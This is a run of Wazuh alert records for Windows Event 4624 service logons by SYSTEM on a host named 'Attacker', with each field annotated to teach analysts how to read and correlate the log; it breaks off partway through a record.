id: 1745533926.370337 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the record. Security-Auditing means a Security-log audit event, not an application, System-log or Sysmon event.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID. This value is the fixed GUID of Microsoft-Windows-Security-Auditing; filter on it when provider names are localized or missing.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = an account was successfully logged on; read it together with logonType and processName below.
data.win.system.version: 3 Schema version of the event template. Later 4624 versions add fields such as Restricted Admin Mode, Virtual Account, Elevated Token and Remote Credential Guard, so parsers must tolerate fields missing on older hosts.
data.win.system.level: 0 Numeric level. 0 is LogAlways, which every Security-Auditing record carries; success versus failure comes from keywords/severityValue, not from level.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.). 12544 is the Logon category.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows. 0x8020000000000000 is Audit Success and 0x8010000000000000 is Audit Failure, so this is the field to split successes from failures in queries.
data.win.system.systemTime: 2025-04-20T01:51:38.0009000Z Time the record was written on the endpoint, in UTC (trailing Z). Compare it with the Wazuh alert id, whose prefix is the manager's Unix timestamp: the records here are dated 2025-04-20 but the alert ids on this page resolve to 2025-04-24, so they were read from backlog (e.g. a newly enrolled agent) or the endpoint clock is off. Settle that before building a timeline.
data.win.system.eventRecordID: 43707 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that logged the record (typically lsass.exe, which hosts the auditing subsystem), not the process that performed the logon; that one is data.win.eventdata.processId.
data.win.system.threadID: 8104 Thread inside that logging process. Only needed in deep forensics.
data.win.system.channel: Security Event log channel holding the record. The Security log is populated only for subcategories the audit policy enables and is readable by default only by Administrators and Event Log Readers.
data.win.system.computer: Attacker Computer name recorded in the event itself. It should match agent.name; a mismatch is worth explaining.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh severity text. For the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; a successful logon still deserves reading.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message: the event's field values followed by Microsoft's standard explanatory text for this event ID. The same values are parsed into data.win.eventdata.* below; read the message, query the fields.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well-known LocalSystem SID.
data.win.eventdata.subjectUserName: ATTACKER$ Name of the requesting account. The trailing $ marks the computer account, i.e. the host itself acting as SYSTEM.
data.win.eventdata.subjectDomainName: WORKGROUP Domain of the requesting account. WORKGROUP means the host is not domain-joined, so expect local accounts and NTLM rather than Kerberos.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3e7 (999) is the fixed LocalSystem session that exists from boot.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on. Here it equals the subject SID: SYSTEM logging on as SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Name of the account that was logged on. The main pivot for "who logged on".
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged-on account. NT AUTHORITY\SYSTEM is the built-in LocalSystem account.
data.win.eventdata.targetLogonId: 0x3e7 ID of the new logon session. Join it with 4634/4647 (logoff), 4672 (special privileges) and 4688 (process creation) to follow what the session did.
data.win.eventdata.logonType: 5 Logon type. 5 = Service: the Service Control Manager started a service under this account. Routine on its own; correlate with new service installs (4697 in Security, 7045 in System) before calling it benign. Other common values: 2 interactive, 3 network, 10 RDP.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the logon. Advapi is the LogonUser API path the SCM uses for service logons; interactive logons show User32, network logons NtLmSsp or Kerberos.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate selects Kerberos when a KDC is reachable and otherwise NTLM, which on a WORKGROUP host is the only option.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID for correlating with a KDC event (4768/4769). All zeros means no Kerberos ticket was involved, so there is nothing to join on a domain controller.
data.win.eventdata.keyLength: 0 Length of the session key negotiated for the logon. 0 is normal here: the event text itself says it is 0 when no session key was requested, as for a local service logon. Only on network NTLM logons does a short key (e.g. 56 or 40 bits) hint at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex; 0x304 = 772) of the process that called the logon API, the same process as processName.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that performed the logon. services.exe is the Service Control Manager, which is what type 5 should show; any other path with type 5 deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Windows resource-string code; the rendered message shows it as Impersonation. It sets how far a process in this session can impersonate the account.
data.win.eventdata.virtualAccount: %%1843 Resource-string code that renders as No: the session is not a virtual account (a Windows-managed service identity such as NT SERVICE\name).
data.win.eventdata.targetLinkedLogonId: 0x0 Logon ID of the linked (UAC split-token) session. 0x0 means there is none, as expected for a service logon.
data.win.eventdata.elevatedToken: %%1842 Resource-string code that renders as Yes: the new session holds a full administrative token. Expected for SYSTEM; noteworthy for ordinary users.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.377673 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider behind every Security‑log audit event (4624, 4688, 4697 and the rest).
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Fixed GUID of that provider; stable across Windows versions and display languages, so filter on it rather than on the name.
data.win.system.eventID: 4624 Successful logon. One of the big ones to know by heart (4624/4625/4672/4688/4697).
data.win.system.version: 3 Event schema version. Newer versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token) that older parsers silently drop.
data.win.system.level: 0 Audit events carry level 0 (Log Always); success or failure is in the keywords, not here.
data.win.system.task: 12544 Task category Logon (12544). 12545 is Logoff.
data.win.system.opcode: 0 Info. Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Audit Success. Audit Failure is 0x8010000000000000; this is the bit to filter on.
data.win.system.systemTime: 2025-04-20T01:51:38.9779159Z When the event was written on the endpoint (UTC, 100‑ns precision). Order timelines by this, not by the alert id: the event is dated 2025‑04‑20, but the id (1745533926 is 2025‑04‑24T22:32Z) shows it was ingested four days later, so the agent shipped it late.
data.win.system.eventRecordID: 43712 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that wrote the event (normally lsass.exe for Security audits), not the process inside the event body.
data.win.system.threadID: 14916 Thread in that logging process. Forensic detail only.
data.win.system.channel: Security The Security log; 4624 lands here only when the Logon audit subcategory is enabled (success auditing is on by default).
data.win.system.computer: Attacker Hostname that generated the event. Should match agent.name; a mismatch means forwarded events.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh's text form of the keywords. Security events show AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Full rendered event text. The eventdata fields below are parsed from it, and it is where the %%NNNN codes are spelled out (Impersonation, No, Yes).
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, so the requester is the OS itself, not a person.
data.win.eventdata.subjectUserName: ATTACKER$ Requester shown as the host's computer account (trailing $). Normal when the subject is LocalSystem.
data.win.eventdata.subjectDomainName: WORKGROUP Host is not domain‑joined, so there is no AD side to correlate against.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3E7 (999) is the fixed ID of the SYSTEM session on every Windows host.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on: LocalSystem again.
data.win.eventdata.targetUserName: SYSTEM Account that received the new logon. Pair with targetLogonId when pivoting.
data.win.eventdata.targetDomainName: NT AUTHORITY Pseudo‑domain for built‑in identities such as SYSTEM, LOCAL SERVICE and NETWORK SERVICE.
data.win.eventdata.targetLogonId: 0x3e7 The "new" logon is the existing SYSTEM session (0x3E7); no separate session was created. Join on it to find 4672/4688/4634 for the same session on this host.
data.win.eventdata.logonType: 5 Service: the Service Control Manager started a service under its configured account. SYSTEM from services.exe is routine at boot and on service restarts; the check is whether a service was just installed (Security 4697 / System 7045) and whether the timing is explained.
data.win.eventdata.logonProcessName: Advapi Logon requested through the LogonUser API (what SCM uses), not Winlogon and not a network listener.
data.win.eventdata.authenticationPackageName: Negotiate Negotiate would choose Kerberos or NTLM, but a built‑in local account does no network authentication, so this says nothing about protocol strength here.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros: no Kerberos ticket was involved, so there is no KDC event (4768/4769) to correlate with.
data.win.eventdata.keyLength: 0 Length of the session key in bits. 0 means none was requested, which is normal for local and service logons; it is not a weak key and not a downgrade indicator. Only read it together with Package Name when the package is NTLM.
data.win.eventdata.processId: 0x304 PID (hex; 772 decimal) of the process on the endpoint that requested the logon.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe The Service Control Manager. A type 5 logon requested by anything other than services.exe is worth a look.
data.win.eventdata.impersonationLevel: %%1833 Message‑table placeholder; the rendered message resolves it to Impersonation (the token can act as the account on this machine, not across the network).
data.win.eventdata.virtualAccount: %%1843 Resolves to No: a real account, not a per‑service virtual account.
data.win.eventdata.targetLinkedLogonId: 0x0 No linked session; a non‑zero value would point at the other half of a UAC split token.
data.win.eventdata.elevatedToken: %%1842 Resolves to Yes: the token carries full administrative rights. Expected for SYSTEM.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.385011 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider behind every Security‑log audit event (4624, 4688, 4697 and the rest).
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Fixed GUID of that provider; stable across Windows versions and display languages, so filter on it rather than on the name.
data.win.system.eventID: 4624 Successful logon. One of the big ones to know by heart (4624/4625/4672/4688/4697).
data.win.system.version: 3 Event schema version. Newer versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token) that older parsers silently drop.
data.win.system.level: 0 Audit events carry level 0 (Log Always); success or failure is in the keywords, not here.
data.win.system.task: 12544 Task category Logon (12544). 12545 is Logoff.
data.win.system.opcode: 0 Info. Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Audit Success. Audit Failure is 0x8010000000000000; this is the bit to filter on.
data.win.system.systemTime: 2025-04-20T01:51:47.2593671Z When the event was written on the endpoint (UTC, 100‑ns precision). Order timelines by this, not by the alert id: the event is dated 2025‑04‑20, but the id (1745533926 is 2025‑04‑24T22:32Z) shows it was ingested four days later, so the agent shipped it late.
data.win.system.eventRecordID: 43718 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that wrote the event (normally lsass.exe for Security audits), not the process inside the event body.
data.win.system.threadID: 888 Thread in that logging process. Forensic detail only.
data.win.system.channel: Security The Security log; 4624 lands here only when the Logon audit subcategory is enabled (success auditing is on by default).
data.win.system.computer: Attacker Hostname that generated the event. Should match agent.name; a mismatch means forwarded events.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh's text form of the keywords. Security events show AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Full rendered event text. The eventdata fields below are parsed from it, and it is where the %%NNNN codes are spelled out (Impersonation, No, Yes).
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, so the requester is the OS itself, not a person.
data.win.eventdata.subjectUserName: ATTACKER$ Requester shown as the host's computer account (trailing $). Normal when the subject is LocalSystem.
data.win.eventdata.subjectDomainName: WORKGROUP Host is not domain‑joined, so there is no AD side to correlate against.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3E7 (999) is the fixed ID of the SYSTEM session on every Windows host.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on: LocalSystem again.
data.win.eventdata.targetUserName: SYSTEM Account that received the new logon. Pair with targetLogonId when pivoting.
data.win.eventdata.targetDomainName: NT AUTHORITY Pseudo‑domain for built‑in identities such as SYSTEM, LOCAL SERVICE and NETWORK SERVICE.
data.win.eventdata.targetLogonId: 0x3e7 The "new" logon is the existing SYSTEM session (0x3E7); no separate session was created. Join on it to find 4672/4688/4634 for the same session on this host.
data.win.eventdata.logonType: 5 Service: the Service Control Manager started a service under its configured account. SYSTEM from services.exe is routine at boot and on service restarts; the check is whether a service was just installed (Security 4697 / System 7045) and whether the timing is explained.
data.win.eventdata.logonProcessName: Advapi Logon requested through the LogonUser API (what SCM uses), not Winlogon and not a network listener.
data.win.eventdata.authenticationPackageName: Negotiate Negotiate would choose Kerberos or NTLM, but a built‑in local account does no network authentication, so this says nothing about protocol strength here.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros: no Kerberos ticket was involved, so there is no KDC event (4768/4769) to correlate with.
data.win.eventdata.keyLength: 0 Length of the session key in bits. 0 means none was requested, which is normal for local and service logons; it is not a weak key and not a downgrade indicator. Only read it together with Package Name when the package is NTLM.
data.win.eventdata.processId: 0x304 PID (hex; 772 decimal) of the process on the endpoint that requested the logon.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe The Service Control Manager. A type 5 logon requested by anything other than services.exe is worth a look.
data.win.eventdata.impersonationLevel: %%1833 Message‑table placeholder; the rendered message resolves it to Impersonation (the token can act as the account on this machine, not across the network).
data.win.eventdata.virtualAccount: %%1843 Resolves to No: a real account, not a per‑service virtual account.
data.win.eventdata.targetLinkedLogonId: 0x0 No linked session; a non‑zero value would point at the other half of a UAC split token.
data.win.eventdata.elevatedToken: %%1842 Resolves to Yes: the token carries full administrative rights. Expected for SYSTEM.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.392345 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider behind every Security‑log audit event (4624, 4688, 4697 and the rest).
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Fixed GUID of that provider; stable across Windows versions and display languages, so filter on it rather than on the name.
data.win.system.eventID: 4624 Successful logon. One of the big ones to know by heart (4624/4625/4672/4688/4697).
data.win.system.version: 3 Event schema version. Newer versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token) that older parsers silently drop.
data.win.system.level: 0 Audit events carry level 0 (Log Always); success or failure is in the keywords, not here.
data.win.system.task: 12544 Task category Logon (12544). 12545 is Logoff.
data.win.system.opcode: 0 Info. Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Audit Success. Audit Failure is 0x8010000000000000; this is the bit to filter on.
data.win.system.systemTime: 2025-04-20T01:52:57.5252040Z When the event was written on the endpoint (UTC, 100‑ns precision). Order timelines by this, not by the alert id: the event is dated 2025‑04‑20, but the id (1745533926 is 2025‑04‑24T22:32Z) shows it was ingested four days later, so the agent shipped it late.
data.win.system.eventRecordID: 43720 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that wrote the event (normally lsass.exe for Security audits), not the process inside the event body.
data.win.system.threadID: 4968 Thread in that logging process. Forensic detail only.
data.win.system.channel: Security The Security log; 4624 lands here only when the Logon audit subcategory is enabled (success auditing is on by default).
data.win.system.computer: Attacker Hostname that generated the event. Should match agent.name; a mismatch means forwarded events.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh's text form of the keywords. Security events show AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Full rendered event text. The eventdata fields below are parsed from it, and it is where the %%NNNN codes are spelled out (Impersonation, No, Yes).
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, so the requester is the OS itself, not a person.
data.win.eventdata.subjectUserName: ATTACKER$ Requester shown as the host's computer account (trailing $). Normal when the subject is LocalSystem.
data.win.eventdata.subjectDomainName: WORKGROUP Host is not domain‑joined, so there is no AD side to correlate against.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3E7 (999) is the fixed ID of the SYSTEM session on every Windows host.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on: LocalSystem again.
data.win.eventdata.targetUserName: SYSTEM Account that received the new logon. Pair with targetLogonId when pivoting.
data.win.eventdata.targetDomainName: NT AUTHORITY Pseudo‑domain for built‑in identities such as SYSTEM, LOCAL SERVICE and NETWORK SERVICE.
data.win.eventdata.targetLogonId: 0x3e7 The "new" logon is the existing SYSTEM session (0x3E7); no separate session was created. Join on it to find 4672/4688/4634 for the same session on this host.
data.win.eventdata.logonType: 5 Service: the Service Control Manager started a service under its configured account. SYSTEM from services.exe is routine at boot and on service restarts; the check is whether a service was just installed (Security 4697 / System 7045) and whether the timing is explained.
data.win.eventdata.logonProcessName: Advapi Logon requested through the LogonUser API (what SCM uses), not Winlogon and not a network listener.
data.win.eventdata.authenticationPackageName: Negotiate Negotiate would choose Kerberos or NTLM, but a built‑in local account does no network authentication, so this says nothing about protocol strength here.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros: no Kerberos ticket was involved, so there is no KDC event (4768/4769) to correlate with.
data.win.eventdata.keyLength: 0 Length of the session key in bits. 0 means none was requested, which is normal for local and service logons; it is not a weak key and not a downgrade indicator. Only read it together with Package Name when the package is NTLM.
data.win.eventdata.processId: 0x304 PID (hex; 772 decimal) of the process on the endpoint that requested the logon.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe The Service Control Manager. A type 5 logon requested by anything other than services.exe is worth a look.
data.win.eventdata.impersonationLevel: %%1833 Message‑table placeholder; the rendered message resolves it to Impersonation (the token can act as the account on this machine, not across the network).
data.win.eventdata.virtualAccount: %%1843 Resolves to No: a real account, not a per‑service virtual account.
data.win.eventdata.targetLinkedLogonId: 0x0 No linked session; a non‑zero value would point at the other half of a UAC split token.
data.win.eventdata.elevatedToken: %%1842 Resolves to Yes: the token carries full administrative rights. Expected for SYSTEM.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.399681 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider behind every Security‑log audit event (4624, 4688, 4697 and the rest).
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Fixed GUID of that provider; stable across Windows versions and display languages, so filter on it rather than on the name.
data.win.system.eventID: 4624 Successful logon. One of the big ones to know by heart (4624/4625/4672/4688/4697).
data.win.system.version: 3 Event schema version. Newer versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token) that older parsers silently drop.
data.win.system.level: 0 Audit events carry level 0 (Log Always); success or failure is in the keywords, not here.
data.win.system.task: 12544 Task category Logon (12544). 12545 is Logoff.
data.win.system.opcode: 0 Info. Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Audit Success. Audit Failure is 0x8010000000000000; this is the bit to filter on.
data.win.system.systemTime: 2025-04-20T01:53:07.9865975Z When the event was written on the endpoint (UTC, 100‑ns precision). Order timelines by this, not by the alert id: the event is dated 2025‑04‑20, but the id (1745533926 is 2025‑04‑24T22:32Z) shows it was ingested four days later, so the agent shipped it late.
data.win.system.eventRecordID: 43722 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that wrote the event (normally lsass.exe for Security audits), not the process inside the event body.
data.win.system.threadID: 888 Thread in that logging process. Forensic detail only.
data.win.system.channel: Security The Security log; 4624 lands here only when the Logon audit subcategory is enabled (success auditing is on by default).
data.win.system.computer: Attacker Hostname that generated the event. Should match agent.name; a mismatch means forwarded events.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh's text form of the keywords. Security events show AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Full rendered event text. The eventdata fields below are parsed from it, and it is where the %%NNNN codes are spelled out (Impersonation, No, Yes).
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, so the requester is the OS itself, not a person.
data.win.eventdata.subjectUserName: ATTACKER$ Requester shown as the host's computer account (trailing $). Normal when the subject is LocalSystem.
data.win.eventdata.subjectDomainName: WORKGROUP Host is not domain‑joined, so there is no AD side to correlate against.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3E7 (999) is the fixed ID of the SYSTEM session on every Windows host.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on: LocalSystem again.
